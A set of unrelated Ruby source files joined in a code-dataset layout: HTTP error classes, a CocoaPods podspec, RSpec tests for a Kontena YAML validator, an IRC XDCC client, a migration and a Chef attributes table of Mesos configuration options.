class HTTP5XXError < HTTPError; end
# 3XX
class HTTPMultipleChoices < HTTP3XXError; register_error(300); end
class HTTPMovedPermanently < HTTP3XXError; register_error(301); end
class HTTPFound < HTTP3XXError; register_error(302); end
class HTTPSeeOther < HTTP3XXError; register_error(303); end
class HTTPNotModified < HTTP3XXError; register_error(304); end
class HTTPUseProxy < HTTP3XXError; register_error(305); end
class HTTPTemporaryRedirect < HTTP3XXError; register_error(307); end
# 4XX
class HTTPBadRequest < HTTP4XXError; register_error(400); end
class HTTPUnauthorized < HTTP4XXError; register_error(401); end
class HTTPPaymentRequired < HTTP4XXError; register_error(402); end
class HTTPForbidden < HTTP4XXError; register_error(403); end
class HTTPNotFound < HTTP4XXError; register_error(404); end
class HTTPMethodNotAllowed < HTTP4XXError; register_error(405); end
class HTTPNotAcceptable < HTTP4XXError; register_error(406); end
class HTTPProxyAuthenticationRequired < HTTP4XXError; register_error(407); end
class HTTPRequestTimeout < HTTP4XXError; register_error(408); end
class HTTPConflict < HTTP4XXError; register_error(409); end
class HTTPGone < HTTP4XXError; register_error(410); end
class HTTPLengthRequired < HTTP4XXError; register_error(411); end
class HTTPPreconditionFailed < HTTP4XXError; register_error(412); end
class HTTPRequestEntityTooLarge < HTTP4XXError; register_error(413); end
class HTTPRequestURITooLong < HTTP4XXError; register_error(414); end
class HTTPUnsupportedMediaType < HTTP4XXError; register_error(415); end
# 5XX
class HTTPInternalServerError < HTTP5XXError; register_error(500); end
class HTTPNotImplemented < HTTP5XXError; register_error(501); end
class HTTPBadGateway < HTTP5XXError; register_error(502); end
class HTTPServiceUnavailable < HTTP5XXError; register_error(503); end
class HTTPGatewayTimeout < HTTP5XXError; register_error(504); end
end
end
| 31.703704 | 121 | 0.688752 |
bb68ecdbf6e79d7267572a721b7b1d096f1c6d7e | 972 | Pod::Spec.new do |s|
s.name = "PickImageAlert"
s.version = "1.0.6"
s.summary = "Photos or camera access using the system alert controller"
s.description = "PickImageAlert provides a list of your photos in your alert controller with three alert actions"
s.requires_arc = true
s.homepage = "https://github.com/thejohnlima/PickImageAlert"
s.license = "MIT"
s.author = { "John Lima" => "[email protected]" }
s.social_media_url = "https://twitter.com/thejohnlima"
s.platform = :ios, "11.0"
s.source = { :git => "https://github.com/thejohnlima/PickImageAlert.git", :tag => "#{s.version}" }
s.framework = "UIKit"
s.source_files = "Framework/PickImageAlert/**/*.{swift}"
s.resources = "Framework/PickImageAlert/**/*.{png,jpeg,jpg,storyboard,xib,xcassets}"
s.swift_version = "5.0"
s.dependency 'SwiftLint'
end | 54 | 122 | 0.600823 |
0801fde038761b9b0f09893d51ecbc39d542bbfe | 10,243 | require 'kontena/cli/apps/yaml/validator_v2'
describe Kontena::Cli::Apps::YAML::ValidatorV2 do
describe '#validate_options' do
context 'build' do
it 'can be string' do
result = subject.validate_options('build' => '.')
expect(result.valid?).to be_truthy
expect(result.errors.key?('build')).to be_falsey
end
it 'can be hash' do
result = subject.validate_options('build' => { 'context' => '.' })
expect(result.valid?).to be_truthy
expect(result.errors.key?('build')).to be_falsey
end
it 'returns error if build is hash and context is missing' do
result = subject.validate_options('build' => {})
expect(result.valid?).to be_falsey
expect(result.errors.key?('build')).to be_truthy
end
it 'returns error if optional dockerfile is not string' do
result = subject.validate_options('build' => {
'context' => '.',
'dockerfile' => 123
})
expect(result.valid?).to be_falsey
expect(result.errors.key?('build')).to be_truthy
end
end
it 'validates image is string' do
result = subject.validate_options('image' => true)
expect(result.valid?).to be_falsey
expect(result.errors.key?('image')).to be_truthy
end
it 'validates stateful is boolean' do
result = subject.validate_options('stateful' => 'bool')
expect(result.errors.key?('stateful')).to be_truthy
end
it 'validates network_mode is host or bridge' do
result = subject.validate_options('network_mode' => 'invalid')
expect(result.errors.key?('network_mode')).to be_truthy
result = subject.validate_options('network_mode' => 'bridge')
expect(result.errors.key?('network_mode')).to be_falsey
result = subject.validate_options('network_mode' => 'host')
expect(result.errors.key?('network_mode')).to be_falsey
end
context 'affinity' do
it 'is optional' do
result = subject.validate_options({})
expect(result.errors.key?('affinity')).to be_falsey
end
it 'must be array' do
result = subject.validate_options('affinity' => 'node==node1')
expect(result.errors.key?('affinity')).to be_truthy
result = subject.validate_options('affinity' => ['node==node1'])
expect(result.errors.key?('affinity')).to be_falsey
end
it 'validates format' do
result = subject.validate_options('affinity' => ['node=node1'])
expect(result.errors.key?('affinity')).to be_truthy
result = subject.validate_options('affinity' => ['node==node1', 'service!=mariadb'])
expect(result.errors.key?('affinity')).to be_falsey
end
end
context 'command' do
it 'is optional' do
result = subject.validate_options({})
expect(result.errors.key?('command')).to be_falsey
end
it 'must be string or empty' do
result = subject.validate_options('command' => 1234)
expect(result.errors.key?('command')).to be_truthy
result = subject.validate_options('command' => nil)
expect(result.errors.key?('command')).to be_falsey
result = subject.validate_options('command' => 'bundle exec rails s')
expect(result.errors.key?('command')).to be_falsey
end
end
it 'validates cpu_shares is integer' do
result = subject.validate_options('cpu_shares' => '1m')
expect(result.errors.key?('cpu_shares')).to be_truthy
result = subject.validate_options('cpu_shares' => 1024)
expect(result.errors.key?('cpu_shares')).to be_falsey
result = subject.validate_options({})
expect(result.errors.key?('cpu_shares')).to be_falsey
end
it 'validates environment is array or hash' do
result = subject.validate_options('environment' => 'KEY=VALUE')
expect(result.errors.key?('environment')).to be_truthy
result = subject.validate_options('environment' => ['KEY=VALUE'])
expect(result.errors.key?('environment')).to be_falsey
result = subject.validate_options('environment' => { 'KEY' => 'VALUE' })
expect(result.errors.key?('environment')).to be_falsey
end
context 'validates secrets' do
it 'must be array' do
result = subject.validate_options('secrets' => {})
expect(result.errors.key?('secrets')).to be_truthy
end
context 'item' do
it 'must contain secret' do
result = subject.validate_options('secrets' => [{ 'name' => 'test', 'type' => 'env' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'must contain name' do
result = subject.validate_options('secrets' => [{ 'secret' => 'test', 'type' => 'env' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'must contain type' do
result = subject.validate_options('secrets' => [{ 'secret' => 'test', 'name' => 'test' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'accepts valid input' do
result = subject.validate_options('secrets' =>
[
{
'secret' => 'test',
'name' => 'test',
'type' => 'env'
}
])
expect(result.errors.key?('secrets')).to be_falsey
end
end
end
context 'logging' do
context 'options' do
it 'must be hash' do
result = subject.validate_options('logging' => { 'options' => [] })
expect(result.errors.key?('logging')).to be_truthy
data = {
'logging' => {
'options' => {
'syslog-address' => "tcp://192.168.0.42:123"
}
}
}
result = subject.validate_options(data)
expect(result.errors.key?('logging')).to be_falsey
end
end
end
context 'hooks' do
context 'validates pre_build' do
it 'must be array' do
result = subject.validate_options('hooks' => { 'pre_build' => {} })
expect(result.errors.key?('hooks')).to be_truthy
data = {
'hooks' => {
'pre_build' => [
{
'cmd' => 'rake db:migrate'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks')).to be_falsey
end
end
context 'post_start' do
it 'must be array' do
result = subject.validate_options('hooks' => { 'post_start' => {} })
expect(result.errors.key?('hooks')).to be_truthy
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => '*'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks')).to be_falsey
end
context 'item' do
it 'must contain name' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{
'cmd' => 'rake db:migrate',
'instances' => '1'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'must contain cmd' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{
'name' => 'migrate',
'instances' => '1'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'must contain instance number or *' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{ 'name' => 'migrate',
'cmd' => 'rake db:migrate'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => 'all',
'oneshot' => true
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'may contain boolean oneshot' do
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => '*',
'oneshot' => 'true'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
end
it 'validates depends_on is array' do
result = subject.validate_options('depends_on' => 'web')
expect(result.errors.key?('depends_on')).to be_truthy
result = subject.validate_options('depends_on' => ['web'])
expect(result.errors.key?('depends_on')).to be_falsey
end
it 'validates volumes is array' do
result = subject.validate_options('volumes' => '/app')
expect(result.errors.key?('volumes')).to be_truthy
result = subject.validate_options('volumes' => ['/app'])
expect(result.errors.key?('volumes')).to be_falsey
end
it 'validates volumes_from is array' do
result = subject.validate_options('volumes_from' => 'mysql_data')
expect(result.errors.key?('volumes_from')).to be_truthy
result = subject.validate_options('volumes_from' => ['mysql_data'])
expect(result.errors.key?('volumes_from')).to be_falsey
end
end
end
end
end
| 33.917219 | 100 | 0.531485 |
87f6fd5927d41a054df9abc9643ab4eae9552e33 | 1,433 | require 'cinch'
module XDCC
class Client
attr_accessor :bot
attr_accessor :connected
alias_method :connected?, :connected
@mutex # Mutex
@connection_resource # ConditionVariable
def initialize(server, channel: nil, nickname: "Guest-#{Time.now.to_i}")
this = self
@mutex = mutex = Mutex.new
@connection_resource = connection_resource = ConditionVariable.new
@connected = false
@bot = Cinch::Bot.new do
configure do |c|
c.server = server
c.nick = nickname
c.channels = ["##{channel}"] if channel
end
on :connect do |m|
mutex.synchronize {
this.connected = true
connection_resource.signal
}
end
end
@bot.loggers.level = :info
end
def connect
@mutex.synchronize do
if connected?
@bot.info('Already connected')
return
end
end
Thread.new @bot, &:start
@mutex.synchronize {@connection_resource.wait @mutex}
@bot.info("Connected to #{@bot.config.server}:#{@bot.config.port}")
end
def disconnect
@mutex.synchronize do
if !connected?
@bot.info "Not connected"
return
end
end
@bot.quit
@mutex.synchronize {@connected = false}
@bot.info "Disconnected from #{@bot.config.server}:#{@bot.config.port}"
end
end
end
| 24.288136 | 77 | 0.5806 |
e91a3edddcfeecfed82c97e5c653605b7ca080ec | 168 | class CreateUsersUsingReplication < BaseOctopusMigrationClass
def self.up
Cat.create!(:name => 'Replication')
end
def self.down
Cat.delete_all
end
end
| 16.8 | 61 | 0.732143 |
5d4cc02e882f7d5df0410f8fbb58aab059a2cb24 | 21,583 | default['mesos']['options'] = {
'master' => {
'acls' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'advertise_ip' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'advertise_port' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'allocation_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
'allocator' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'HierarchicalDRF',
'flag' => false,
'deprecated' => false
},
'authenticate' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'authenticate_slaves' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'authenticators' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'authorizers' => {
'version' => ['0.23.0'],
'default' => 'local',
'flag' => false,
'deprecated' => false
},
'cluster' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'credentials' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'external_log_file' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'firewall_rules' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'framework_sorter' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'drf',
'flag' => false,
'deprecated' => false
},
'hooks' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hostname' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'initialize_driver_logging' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'ip' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'ip_discovery_command' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'log_auto_initialize' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'log_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/var/log/mesos',
'flag' => false,
'deprecated' => false
},
'logbufsecs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 0,
'flag' => false,
'deprecated' => false
},
'logging_level' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'INFO',
'flag' => false,
'deprecated' => false
},
'max_slave_ping_timeouts' => {
'version' => ['0.23.0'],
'default' => 5,
'flag' => false,
'deprecated' => false
},
'max_executors_per_slave' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'modules' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'offer_timeout' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'port' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5050',
'flag' => false,
'deprecated' => false
},
'quiet' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'quorum' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 1,
'flag' => false,
'deprecated' => false
},
'rate_limits' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'recovery_slave_removal_limit' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '100%',
'flag' => false,
'deprecated' => false
},
'registry' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'replicated_log',
'flag' => false,
'deprecated' => false
},
'registry_fetch_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'registry_store_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5secs',
'flag' => false,
'deprecated' => false
},
'registry_strict' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'roles' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'root_submissions' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'slave_ping_timeout' => {
'version' => ['0.23.0'],
'default' => '15secs',
'flag' => false,
'deprecated' => false
},
'slave_removal_rate_limit' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'slave_register_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10mins',
'flag' => false,
'deprecated' => false
},
'user_sorter' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'drf',
'flag' => false,
'deprecated' => false
},
'webui_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/usr/local/share/mesos/webui',
'flag' => false,
'deprecated' => false
},
'weights' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'whitelist' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '*',
'flag' => false,
'deprecated' => false
},
'work_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'zk' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'zk_session_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10secs',
'flag' => false,
'deprecated' => false
}
},
'slave' => {
'attributes' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'authenticatee' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => 'crammd5',
'flag' => false,
'deprecated' => false
},
'cgroups_cpu_enable_pids_and_tids_count' => {
'version' => ['0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_enable_cfs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_hierarchy' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/sys/fs/cgroup',
'flag' => false,
'deprecated' => false
},
'cgroups_limit_swap' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_root' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'container_disk_watch_interval' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'cgroups_subsystems' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1'],
'default' => '',
'flag' => false,
'deprecated' => true
},
'checkpoint' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1'],
'default' => true,
'flag' => true,
'deprecated' => true
},
'containerizer_path' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'containerizers' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'credential' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'default_container_image' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'default_container_info' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'network_enable_socket_statistics' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1'],
'default' => false,
'flag' => true,
'deprecated' => true
},
'default_role' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '*',
'flag' => false,
'deprecated' => false
},
'disk_watch_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'docker' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'docker',
'flag' => false,
'deprecated' => false
},
'docker_remove_delay' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '6hrs',
'flag' => false,
'deprecated' => false
},
'docker_kill_orphans' => {
'version' => ['0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'docker_sandbox_directory' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1'],
'default' => '/mnt/mesos/sandbox',
'flag' => false,
'deprecated' => true
},
'docker_stop_timeout' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '0secs',
'flag' => false,
'deprecated' => false
},
'egress_limit_per_container' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'enforce_container_disk_quota' => {
'version' => ['0.22.0', '0.22.1'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'ephemeral_ports_per_container' => {
'version' => ['0.23.0'],
'default' => 1024,
'flag' => false,
'deprecated' => false
},
'eth0_name' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'executor_environment_variables' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'executor_registration_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'executor_shutdown_grace_period' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5secs',
'flag' => false,
'deprecated' => false
},
'external_log_file' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'frameworks_home' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'gc_delay' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1weeks',
'flag' => false,
'deprecated' => false
},
'gc_disk_headroom' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '0.1',
'flag' => false,
'deprecated' => false
},
'hadoop_home' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hooks' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hostname' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'initialize_driver_logging' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'ip' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'ip_discovery_command' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'isolation' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'posix/cpu,posix/mem',
'flag' => false,
'deprecated' => false
},
'launcher_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/usr/libexec/mesos',
'flag' => false,
'deprecated' => false
},
'lo_name' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'log_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/var/log/mesos',
'flag' => false,
'deprecated' => false
},
'logbufsecs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '0',
'flag' => false,
'deprecated' => false
},
'logging_level' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'INFO',
'flag' => false,
'deprecated' => false
},
'master' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'modules' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'oversubscribed_resources_interval' => {
'version' => ['0.23.0'],
'default' => '15secs',
'flag' => false,
'deprecated' => false
},
'perf_duration' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10secs',
'flag' => false,
'deprecated' => false
},
'perf_events' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'perf_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'port' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5051',
'flag' => false,
'deprecated' => false
},
'qos_controller' => {
'version' => ['0.23.0'],
'default' => false,
'flag' => false,
'deprecated' => false
},
'qos_correction_interval_min' => {
'version' => ['0.23.0'],
'default' => '0secs',
'flag' => false,
'deprecated' => false
},
'quiet' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'recover' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'reconnect',
'flag' => false,
'deprecated' => false
},
'recovery_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '15mins',
'flag' => false,
'deprecated' => false
},
'registration_backoff_factor' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
    'resource_estimator' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'resource_monitoring_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
'resources' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'revocable_cpu_low_priority' => {
'version' => ['0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'sandbox_directory' => {
'version' => ['0.23.0'],
'default' => '/mnt/mesos/sandbox',
'flag' => false,
'deprecated' => false
},
'slave_subsystems' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'strict' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'switch_user' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'work_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/tmp/mesos',
'flag' => false,
'deprecated' => false
}
}
}
